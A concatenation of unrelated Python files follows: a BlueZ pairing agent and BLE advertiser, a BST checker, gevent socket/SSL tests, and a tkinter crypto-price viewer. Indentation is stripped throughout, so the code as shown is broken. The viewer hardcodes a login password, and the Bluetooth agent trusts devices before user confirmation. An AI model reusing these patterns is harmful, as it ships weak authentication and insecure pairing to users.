def dev_connect(path):
dev = dbus.Interface(bus.get_object("org.bluez", path),
"org.bluez.Device1")
dev.Connect()
class Rejected(dbus.DBusException):
_dbus_error_name = "org.bluez.Error.Rejected"
def pair_reply():
print("Device paired")
set_trusted(dev_path)
dev_connect(dev_path)
mainloop.quit()
def pair_error(error):
err_name = error.get_dbus_name()
if err_name == "org.freedesktop.DBus.Error.NoReply" and device_obj:
print("Timed out. Cancelling pairing")
device_obj.CancelPairing()
else:
print("Creating device failed: %s" % (error))
def register_ad_cb():
print('Advertisement registered')
def register_ad_error_cb(error):
print('Failed to register advertisement: ' + str(error))
mainloop.quit()
def find_adapter(bus):
remote_om = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, '/'),
DBUS_OM_IFACE)
objects = remote_om.GetManagedObjects()
for o, props in objects.items():
if LE_ADVERTISING_MANAGER_IFACE in props:
return o
return None
def shutdown(timeout):
print('Advertising for {} seconds...'.format(timeout))
time.sleep(timeout)
mainloop.quit()
class Agent(dbus.service.Object):
exit_on_release = True
def set_exit_on_release(self, exit_on_release):
self.exit_on_release = exit_on_release
@dbus.service.method(AGENT_INTERFACE,
in_signature="", out_signature="")
def Release(self):
print("Release")
if self.exit_on_release:
mainloop.quit()
@dbus.service.method(AGENT_INTERFACE,
in_signature="os", out_signature="")
def AuthorizeService(self, device, uuid):
print("AuthorizeService (%s, %s)" % (device, uuid))
authorize = ask("Authorize connection (yes/no): ")
if (authorize == "yes"):
return
raise Rejected("Connection rejected by user")
@dbus.service.method(AGENT_INTERFACE,
in_signature="o", out_signature="s")
def RequestPinCode(self, device):
print("RequestPinCode (%s)" % (device))
set_trusted(device)
return ask("Enter PIN Code: ")
@dbus.service.method(AGENT_INTERFACE,
in_signature="o", out_signature="u")
def RequestPasskey(self, device):
print("RequestPasskey (%s)" % (device))
set_trusted(device)
passkey = ask("Enter passkey: ")
return dbus.UInt32(passkey)
@dbus.service.method(AGENT_INTERFACE,
in_signature="ouq", out_signature="")
def DisplayPasskey(self, device, passkey, entered):
print("DisplayPasskey (%s, %06u entered %u)" %
(device, passkey, entered))
@dbus.service.method(AGENT_INTERFACE,
in_signature="os", out_signature="")
def DisplayPinCode(self, device, pincode):
print("DisplayPinCode (%s, %s)" % (device, pincode))
@dbus.service.method(AGENT_INTERFACE,
in_signature="ou", out_signature="")
def RequestConfirmation(self, device, passkey):
print("RequestConfirmation (%s, %06d)" % (device, passkey))
confirm = ask("Confirm passkey (yes/no): ")
if (confirm == "yes"):
set_trusted(device)
return
raise Rejected("Passkey doesn't match")
@dbus.service.method(AGENT_INTERFACE,
in_signature="o", out_signature="")
def RequestAuthorization(self, device):
print("RequestAuthorization (%s)" % (device))
auth = ask("Authorize? (yes/no): ")
if (auth == "yes"):
return
raise Rejected("Pairing rejected")
@dbus.service.method(AGENT_INTERFACE,
in_signature="", out_signature="")
def Cancel(self):
print("Cancel")
class Advertisement(dbus.service.Object):
PATH_BASE = '/org/bluez/example/advertisement'
def __init__(self, bus, index, advertising_type):
self.path = self.PATH_BASE + str(index)
self.bus = bus
self.ad_type = advertising_type
self.service_uuids = None
self.manufacturer_data = None
self.solicit_uuids = None
self.service_data = None
self.local_name = None
self.include_tx_power = False
self.data = None
dbus.service.Object.__init__(self, bus, self.path)
def get_properties(self):
properties = dict()
properties['Type'] = self.ad_type
if self.service_uuids is not None:
properties['ServiceUUIDs'] = dbus.Array(self.service_uuids,
signature='s')
if self.solicit_uuids is not None:
properties['SolicitUUIDs'] = dbus.Array(self.solicit_uuids,
signature='s')
if self.manufacturer_data is not None:
properties['ManufacturerData'] = dbus.Dictionary(
self.manufacturer_data, signature='qv')
if self.service_data is not None:
properties['ServiceData'] = dbus.Dictionary(self.service_data,
signature='sv')
if self.local_name is not None:
properties['LocalName'] = dbus.String(self.local_name)
properties['Appearance'] = dbus.UInt16(961)
properties['Discoverable'] = dbus.Boolean(True)
properties['DiscoverableTimeout'] = dbus.UInt16(0)
if self.include_tx_power:
properties['Includes'] = dbus.Array(["tx-power"], signature='s')
if self.data is not None:
properties['Data'] = dbus.Dictionary(
self.data, signature='yv')
return {LE_ADVERTISEMENT_IFACE: properties}
def get_path(self):
return dbus.ObjectPath(self.path)
def add_service_uuid(self, uuid):
if not self.service_uuids:
self.service_uuids = []
self.service_uuids.append(uuid)
def add_solicit_uuid(self, uuid):
if not self.solicit_uuids:
self.solicit_uuids = []
self.solicit_uuids.append(uuid)
def add_manufacturer_data(self, manuf_code, data):
if not self.manufacturer_data:
self.manufacturer_data = dbus.Dictionary({}, signature='qv')
self.manufacturer_data[manuf_code] = dbus.Array(data, signature='y')
def add_service_data(self, uuid, data):
if not self.service_data:
self.service_data = dbus.Dictionary({}, signature='sv')
self.service_data[uuid] = dbus.Array(data, signature='y')
def add_local_name(self, name):
if not self.local_name:
self.local_name = ""
self.local_name = dbus.String(name)
def add_data(self, ad_type, data):
if not self.data:
self.data = dbus.Dictionary({}, signature='yv')
self.data[ad_type] = dbus.Array(data, signature='y')
@dbus.service.method(DBUS_PROP_IFACE,
in_signature='s',
out_signature='a{sv}')
def GetAll(self, interface):
print('GetAll')
if interface != LE_ADVERTISEMENT_IFACE:
raise InvalidArgsException()
print('returning props')
return self.get_properties()[LE_ADVERTISEMENT_IFACE]
@dbus.service.method(LE_ADVERTISEMENT_IFACE,
in_signature='',
out_signature='')
def Release(self):
print('%s: Released!' % self.path)
class TestAdvertisement(Advertisement):
def __init__(self, bus, index):
Advertisement.__init__(self, bus, index, 'peripheral')
#self.add_service_uuid('180D')
#self.add_service_uuid('180F')
#self.add_manufacturer_data(0xffff, [0x00, 0x01, 0x02, 0x03])
#self.add_service_data('9999', [0x00, 0x01, 0x02, 0x03, 0x04])
self.add_local_name('TestAdvertisement')
self.include_tx_power = True
#self.add_data(0x26, [0x01, 0x01, 0x00])
def main(timeout=0):
global mainloop
dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)
bus = dbus.SystemBus()
adapter = find_adapter(bus)
if not adapter:
print('LEAdvertisingManager1 interface not found')
return
path = AGENT_PATH
capability = AGENT_CAPABILITY
agent = Agent(bus, path)
obj = bus.get_object(BUS_NAME, "/org/bluez");
manager = dbus.Interface(obj, "org.bluez.AgentManager1")
manager.RegisterAgent(path, capability)
manager.RequestDefaultAgent(path)
print("Agent registered")
adapter_props = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, adapter),
"org.freedesktop.DBus.Properties")
adapter_props.Set("org.bluez.Adapter1", "Powered", dbus.Boolean(1))
ad_manager = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, adapter),
LE_ADVERTISING_MANAGER_IFACE)
test_advertisement = TestAdvertisement(bus, 0)
mainloop = GObject.MainLoop()
ad_manager.RegisterAdvertisement(test_advertisement.get_path(), {},
reply_handler=register_ad_cb,
error_handler=register_ad_error_cb)
if timeout > 0:
threading.Thread(target=shutdown, args=(timeout,)).start()
else:
print('Advertising forever...')
mainloop.run() # blocks until mainloop.quit() is called
ad_manager.UnregisterAdvertisement(test_advertisement)
print('Advertisement unregistered')
dbus.service.Object.remove_from_connection(test_advertisement)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--timeout', default=0, type=int, help="advertise " +
"for this many seconds then stop, 0=run forever " +
"(default: 0)")
args = parser.parse_args()
main(args.timeout)
|
is_bst_hard.py
|
#!/usr/bin/python3
import sys
import threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**25) # new thread will get stack of such size
class Tree(object):
def read(self):
self.n = int(sys.stdin.readline())
# Case: empty tree:
if self.n == 0:
self.key = [0]
self.left = [-1]
self.right = [-1]
else:
self.key = [0 for i in range(self.n)]
self.left = [0 for i in range(self.n)]
self.right = [0 for i in range(self.n)]
for i in range(self.n):
[a, b, c] = map(int, sys.stdin.readline().split())
self.key[i] = a
self.left[i] = b
self.right[i] = c
def in_order(self):
self.result = []
self.in_order_recurse(0)
return self.result
def in_order_recurse(self, root):
if self.left[root] != -1:
# If the left child is ever >= the parent, raise an Exception.
if self.key[self.left[root]] >= self.key[root]:
raise Exception('NOT A BST!')
self.in_order_recurse(self.left[root])
self.result.append(self.key[root])
if self.right[root] != -1:
self.in_order_recurse(self.right[root])
def is_binary_search_tree(self):
# If is_order returns a sorted result, then the tree is a balanced BST.
try:
in_order = self.in_order()
in_order_sort = sorted(in_order)
if in_order == in_order_sort:
return True
else:
return False
except:
return False
def main():
tree = Tree()
tree.read()
if tree.is_binary_search_tree():
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target=main).start()
|
test__makefile_ref.py
|
from __future__ import print_function
import os
from gevent import monkey; monkey.patch_all()
import socket
import ssl
import threading
import unittest
import errno
import weakref
import gevent.testing as greentest
dirname = os.path.dirname(os.path.abspath(__file__))
certfile = os.path.join(dirname, '2_7_keycert.pem')
pid = os.getpid()
PY3 = greentest.PY3
PYPY = greentest.PYPY
CPYTHON = not PYPY
PY2 = not PY3
fd_types = int
if PY3:
long = int
fd_types = (int, long)
WIN = greentest.WIN
from gevent.testing import get_open_files
try:
import psutil
except ImportError:
psutil = None
class Test(greentest.TestCase):
extra_allowed_open_states = ()
def tearDown(self):
self.extra_allowed_open_states = ()
super(Test, self).tearDown()
def assert_raises_EBADF(self, func):
try:
result = func()
except (socket.error, OSError) as ex:
# Windows/Py3 raises "OSError: [WinError 10038]"
if ex.args[0] == errno.EBADF:
return
if WIN and ex.args[0] == 10038:
return
raise
raise AssertionError('NOT RAISED EBADF: %r() returned %r' % (func, result))
def assert_fd_open(self, fileno):
assert isinstance(fileno, fd_types)
open_files = get_open_files()
if fileno not in open_files:
raise AssertionError('%r is not open:\n%s' % (fileno, open_files['data']))
def assert_fd_closed(self, fileno):
assert isinstance(fileno, fd_types), repr(fileno)
assert fileno > 0, fileno
open_files = get_open_files()
if fileno in open_files:
raise AssertionError('%r is not closed:\n%s' % (fileno, open_files['data']))
def _assert_sock_open(self, sock):
# requires the psutil output
open_files = get_open_files()
sockname = sock.getsockname()
for x in open_files['data']:
if getattr(x, 'laddr', None) == sockname:
assert x.status in (psutil.CONN_LISTEN, psutil.CONN_ESTABLISHED) + self.extra_allowed_open_states, x.status
return
raise AssertionError("%r is not open:\n%s" % (sock, open_files['data']))
def assert_open(self, sock, *rest):
if isinstance(sock, fd_types):
if not WIN:
self.assert_fd_open(sock)
else:
fileno = sock.fileno()
assert isinstance(fileno, fd_types), fileno
sockname = sock.getsockname()
assert isinstance(sockname, tuple), sockname
if not WIN:
self.assert_fd_open(fileno)
else:
self._assert_sock_open(sock)
if rest:
self.assert_open(rest[0], *rest[1:])
def assert_closed(self, sock, *rest):
if isinstance(sock, fd_types):
self.assert_fd_closed(sock)
else:
# Under Python3, the socket module returns -1 for a fileno
# of a closed socket; under Py2 it raises
if PY3:
self.assertEqual(sock.fileno(), -1)
else:
self.assert_raises_EBADF(sock.fileno)
self.assert_raises_EBADF(sock.getsockname)
self.assert_raises_EBADF(sock.accept)
if rest:
self.assert_closed(rest[0], *rest[1:])
def make_open_socket(self):
s = socket.socket()
s.bind(('127.0.0.1', 0))
self._close_on_teardown(s)
if WIN or greentest.LINUX:
# Windows and linux (with psutil) doesn't show as open until
# we call listen (linux with lsof accepts either)
s.listen(1)
self.assert_open(s, s.fileno())
return s
if CPYTHON and PY2:
# Keeping raw sockets alive keeps SSL sockets
# from being closed too, at least on CPython2, so we
# need to use weakrefs.
# In contrast, on PyPy, *only* having a weakref lets the
# original socket die and leak
def _close_on_teardown(self, resource):
self.close_on_teardown.append(weakref.ref(resource))
return resource
def _tearDownCloseOnTearDown(self):
self.close_on_teardown = [r() for r in self.close_on_teardown if r() is not None]
super(Test, self)._tearDownCloseOnTearDown()
# Sometimes its this one, sometimes it's test_ssl. No clue why or how.
@greentest.skipOnAppVeyor("This sometimes times out for no apparent reason.")
class TestSocket(Test):
def test_simple_close(self):
s = self.make_open_socket()
fileno = s.fileno()
s.close()
self.assert_closed(s, fileno)
def test_makefile1(self):
s = self.make_open_socket()
fileno = s.fileno()
f = s.makefile()
self.assert_open(s, fileno)
s.close()
# Under python 2, this closes socket wrapper object but not the file descriptor;
# under python 3, both stay open
if PY3:
self.assert_open(s, fileno)
else:
self.assert_closed(s)
self.assert_open(fileno)
f.close()
self.assert_closed(s)
self.assert_closed(fileno)
def test_makefile2(self):
s = self.make_open_socket()
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s)
self.assert_open(s, fileno)
f.close()
# closing fileobject does not close the socket
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_server_simple(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket)
finally:
t.join()
listener.close()
connector.close()
def test_server_makefile1(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
# Under python 2, this closes socket wrapper object but not the file descriptor;
# under python 3, both stay open
if PY3:
self.assert_open(client_socket, fileno)
else:
self.assert_closed(client_socket)
self.assert_open(fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
connector.close()
def test_server_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
def connect():
connector.connect(('127.0.0.1', port))
t = threading.Thread(target=connect)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
# closing fileobject does not close the socket
f.close()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
t.join()
listener.close()
connector.close()
@greentest.skipOnAppVeyor("This sometimes times out for no apparent reason.")
class TestSSL(Test):
def _ssl_connect_task(self, connector, port):
connector.connect(('127.0.0.1', port))
try:
# Note: We get ResourceWarning about 'x'
# on Python 3 if we don't join the spawned thread
x = ssl.wrap_socket(connector)
except socket.error:
# Observed on Windows with PyPy2 5.9.0 and libuv:
# if we don't switch in a timely enough fashion,
# the server side runs ahead of us and closes
# our socket first, so this fails.
pass
else:
#self._close_on_teardown(x)
x.close()
def _make_ssl_connect_task(self, connector, port):
t = threading.Thread(target=self._ssl_connect_task, args=(connector, port))
t.daemon = True
return t
def __cleanup(self, task, *sockets):
# workaround for test_server_makefile1, test_server_makefile2,
# test_server_simple, test_serverssl_makefile1.
# On PyPy on Linux, it is important to join the SSL Connect
# Task FIRST, before closing the sockets. If we do it after
# (which makes more sense) we hang. It's not clear why, except
# that it has something to do with context switches. Inserting a call to
# gevent.sleep(0.1) instead of joining the task has the same
# effect. If the previous tests hang, then later tests can fail with
# SSLError: unknown alert type.
# XXX: Why do those two things happen?
# On PyPy on macOS, we don't have that problem and can use the
# more logical order.
task.join()
for s in sockets:
s.close()
del sockets
del task
def test_simple_close(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
self._close_on_teardown(s)
fileno = s.fileno()
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_makefile1(self):
raw_s = self.make_open_socket()
s = ssl.wrap_socket(raw_s)
self._close_on_teardown(s)
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s, fileno)
s.close()
self.assert_open(s, fileno)
f.close()
raw_s.close()
self.assert_closed(s, fileno)
def test_makefile2(self):
s = self.make_open_socket()
fileno = s.fileno()
s = ssl.wrap_socket(s)
self._close_on_teardown(s)
fileno = s.fileno()
self.assert_open(s, fileno)
f = s.makefile()
self.assert_open(s, fileno)
f.close()
# closing fileobject does not close the socket
self.assert_open(s, fileno)
s.close()
self.assert_closed(s, fileno)
def test_server_simple(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
t = self._make_ssl_connect_task(connector, port)
t.start()
try:
client_socket, _addr = listener.accept()
self._close_on_teardown(client_socket.close)
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
self._close_on_teardown(client_socket)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, listener, connector)
def test_server_makefile1(self):
listener = socket.socket()
self._close_on_teardown(listener)
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
t = self._make_ssl_connect_task(connector, port)
t.start()
try:
client_socket, _addr = listener.accept()
self._close_on_teardown(client_socket.close) # hard ref
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
self._close_on_teardown(client_socket)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_open(client_socket, fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, listener, connector)
def test_server_makefile2(self):
listener = socket.socket()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
connector = socket.socket()
self._close_on_teardown(connector)
t = self._make_ssl_connect_task(connector, port)
t.start()
try:
client_socket, _addr = listener.accept()
self._close_on_teardown(client_socket)
client_socket = ssl.wrap_socket(client_socket, keyfile=certfile, certfile=certfile, server_side=True)
self._close_on_teardown(client_socket)
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
# Closing fileobject does not close SSLObject
f.close()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, connector, listener, client_socket)
def test_serverssl_makefile1(self):
listener = socket.socket()
fileno = listener.fileno()
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
self._close_on_teardown(listener)
listener = ssl.wrap_socket(listener, keyfile=certfile, certfile=certfile)
connector = socket.socket()
self._close_on_teardown(connector)
t = self._make_ssl_connect_task(connector, port)
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_open(client_socket, fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, listener, connector)
@greentest.skipIf(greentest.RUNNING_ON_TRAVIS and greentest.PY37 and greentest.LIBUV,
"Often segfaults, cannot reproduce locally. "
"Not too worried about this before Python 3.7rc1. "
"https://travis-ci.org/gevent/gevent/jobs/327357684")
def test_serverssl_makefile2(self):
listener = socket.socket()
self._close_on_teardown(listener)
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
listener = ssl.wrap_socket(listener, keyfile=certfile, certfile=certfile)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
s = ssl.wrap_socket(connector)
s.sendall(b'test_serverssl_makefile2')
s.close()
connector.close()
t = threading.Thread(target=connect)
t.daemon = True
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
self.assertEqual(f.read(), 'test_serverssl_makefile2')
self.assertEqual(f.read(), '')
f.close()
if WIN and psutil:
# Hmm?
self.extra_allowed_open_states = (psutil.CONN_CLOSE_WAIT,)
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, listener)
if __name__ == '__main__':
unittest.main()
|
Crypto Viewer.py
|
from tkinter import *
from tkinter import Tk
# LOGIN CHECK
def entrar():
email = txtboxemail_log.get()
senha = txtboxpass_log.get()
if (email=="" or senha==""):
erro_blank = Label(LoginFrame, text="Preencha os campos obrigatórios.", background='#111111', font="Segoe 20", fg="red")
erro_blank.place(relwidth=1, relx=0.5, rely=0.65, anchor=CENTER)
else:
if email == "crypto_viewer_user" and senha == "senhacv123":
# MAIN FRAME
root.destroy()
main = Tk()
main.configure(background='#111111')
main.title("Crypto Viewer")
main.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(main, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
main.destroy()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# SELECT CRYPTO
MainFrame = Frame(main, background='#111111')
MainFrame.place(relwidth=1, relheight=0.6, rely=0.2)
def sol_page():
sol = Tk()
sol.configure(background='#111111')
sol.title("Crypto Viewer")
sol.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(sol, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
main.destroy()
sol.destroy()
ws.close()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# INFO SOL
sol_frame = Frame(sol, background='#111111')
sol_frame.place(relwidth=1, relheight=0.6, rely=0.2)
label_sol = Label(sol_frame, text="SOLANA / DOLAR - SOLUSDT", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
label_sol.place(relwidth=0.5, relheight=0.1, relx=0.25, rely=0.25)
lb_loading_sol = Label(sol_frame, text="Carregando...", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
lb_loading_sol.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
import json, websocket
SOCKET = "wss://stream.binance.com:9443/ws/solusdt@kline_1m"
def on_message(ws, message):
valor_sol = json.loads(message)['k']['c']
def show_sol():
lb_val_sol = Label(sol_frame, text=valor_sol, border="0", bg='#FFFFFF', fg="black", font="Segoe 30 bold")
lb_val_sol.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
show_sol()
ws = websocket.WebSocketApp(SOCKET, on_message=on_message)
def back_sol():
sol.destroy()
ws.close()
sol_back = Button(sol_frame, text="Voltar", border="0", bg='black', fg="white", font="Segoe 30 bold", cursor="hand2", command=back_sol)
sol_back.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.6)
# RUN WS
def connect_to_socket():
ws.run_forever()
def on_connect():
import threading
t = threading.Thread(target=connect_to_socket)
t.start()
on_connect()
# RUN SOL
sol.mainloop()
def btc_page():
btc = Tk()
btc.configure(background='#111111')
btc.title("Crypto Viewer")
btc.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(btc, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
main.destroy()
btc.destroy()
ws.close()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# INFO BTC
btc_frame = Frame(btc, background='#111111')
btc_frame.place(relwidth=1, relheight=0.6, rely=0.2)
label_btc = Label(btc_frame, text="BITCOIN / DOLAR - BTCUSDT", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
label_btc.place(relwidth=0.5, relheight=0.1, relx=0.25, rely=0.25)
lb_loading_btc = Label(btc_frame, text="Carregando...", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
lb_loading_btc.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
import json, websocket
SOCKET = "wss://stream.binance.com:9443/ws/btcusdt@kline_1m"
def on_message(ws, message):
valor_btc = json.loads(message)['k']['c']
def show_btc():
lb_val_btc = Label(btc_frame, text=valor_btc, border="0", bg='#FFFFFF', fg="black", font="Segoe 30 bold")
lb_val_btc.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
show_btc()
ws = websocket.WebSocketApp(SOCKET, on_message=on_message)
def back_btc():
btc.destroy()
ws.close()
btc_back = Button(btc_frame, text="Voltar", border="0", bg='black', fg="white", font="Segoe 30 bold", cursor="hand2", command=back_btc)
btc_back.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.6)
# RUN WS
def connect_to_socket():
ws.run_forever()
def on_connect():
import threading
t = threading.Thread(target=connect_to_socket)
t.start()
on_connect()
# RUN BTC
btc.mainloop()
def eth_page():
eth = Tk()
eth.configure(background='#111111')
eth.title("Crypto Viewer")
eth.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(eth, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
main.destroy()
eth.destroy()
ws.close()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# INFO ETH
eth_frame = Frame(eth, background='#111111')
eth_frame.place(relwidth=1, relheight=0.6, rely=0.2)
label_eth = Label(eth_frame, text="ETHEREUM / DOLAR - ETHUSDT", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
label_eth.place(relwidth=0.5, relheight=0.1, relx=0.25, rely=0.25)
lb_loading_eth = Label(eth_frame, text="Carregando...", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
lb_loading_eth.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
import json, websocket
SOCKET = "wss://stream.binance.com:9443/ws/ethusdt@kline_1m"
def on_message(ws, message):
valor_eth = json.loads(message)['k']['c']
def show_eth():
lb_val_btc = Label(eth_frame, text=valor_eth, border="0", bg='#FFFFFF', fg="black", font="Segoe 30 bold")
lb_val_btc.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
show_eth()
ws = websocket.WebSocketApp(SOCKET, on_message=on_message)
def back_eth():
eth.destroy()
ws.close()
eth_back = Button(eth_frame, text="Voltar", border="0", bg='black', fg="white", font="Segoe 30 bold", cursor="hand2", command=back_eth)
eth_back.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.6)
# RUN WS
def connect_to_socket():
ws.run_forever()
def on_connect():
import threading
t = threading.Thread(target=connect_to_socket)
t.start()
on_connect()
# RUN ETH
eth.mainloop()
btc_bttn = Button(MainFrame, text="BTC", border="1", bg='#FFFFFF', fg="black", font="Segoe 30 bold", cursor="hand2", command=btc_page)
btc_bttn.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.3)
eth_bttn = Button(MainFrame, text="ETH", border="1", bg='#FFFFFF', fg="black", font="Segoe 30 bold", cursor="hand2", command=eth_page)
eth_bttn.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.5)
sol_bttn = Button(MainFrame, text="SOL", border="1", bg='#FFFFFF', fg="black", font="Segoe 30 bold", cursor="hand2", command=sol_page)
sol_bttn.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.7)
# RUN MAIN
main.mainloop()
else:
erro_invalidade = Label(LoginFrame, text="Usuário ou senha inválidos. Tente novamente.", background='#111111', font="Segoe 20", fg="red")
erro_invalidade.place(relwidth=1, relx=0.5, rely=0.65, anchor=CENTER)
# DEF EXIT
def exit():
root.destroy()
# INFO PAGE
def info():
txt_info_1 = "Crypto Viewer é um projeto Python desenvilvido para a visualização em tempo real do valor de criptomoedas."
txt_info_2 = "Desenvolvido por Henrique Soriano, estudante de Análise e desenvolvimento de Sistemas - Etec Polivalente Americana"
txt_info_3 = "email: sorianol.henrique@gmail.com"
txt_info_4 = "LinkedIn: linkedin.com/in/henrique-soriano-b6b623226"
# INFO FRAME
root.destroy()
info = Tk()
info.configure(background='#111111')
info.title("Crypto Viewer")
info.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(info, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
info.destroy()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# INFO
info_frame = Frame(info, background='#111111')
info_frame.place(relwidth=1, relheight=0.6, rely=0.2)
lb_loading_eth = Label(info_frame, text=txt_info_1, border="0", bg='#111111', fg="white", font="Segoe 15 bold")
lb_loading_eth.place(relwidth=1, relheight=0.1, rely=0.3)
lb_loading_eth = Label(info_frame, text=txt_info_2, border="0", bg='#111111', fg="white", font="Segoe 15 bold")
lb_loading_eth.place(relwidth=1, relheight=0.1, rely=0.4)
lb_loading_eth = Label(info_frame, text=txt_info_3, border="0", bg='#111111', fg="white", font="Segoe 15 bold")
lb_loading_eth.place(relwidth=1, relheight=0.1, rely=0.5)
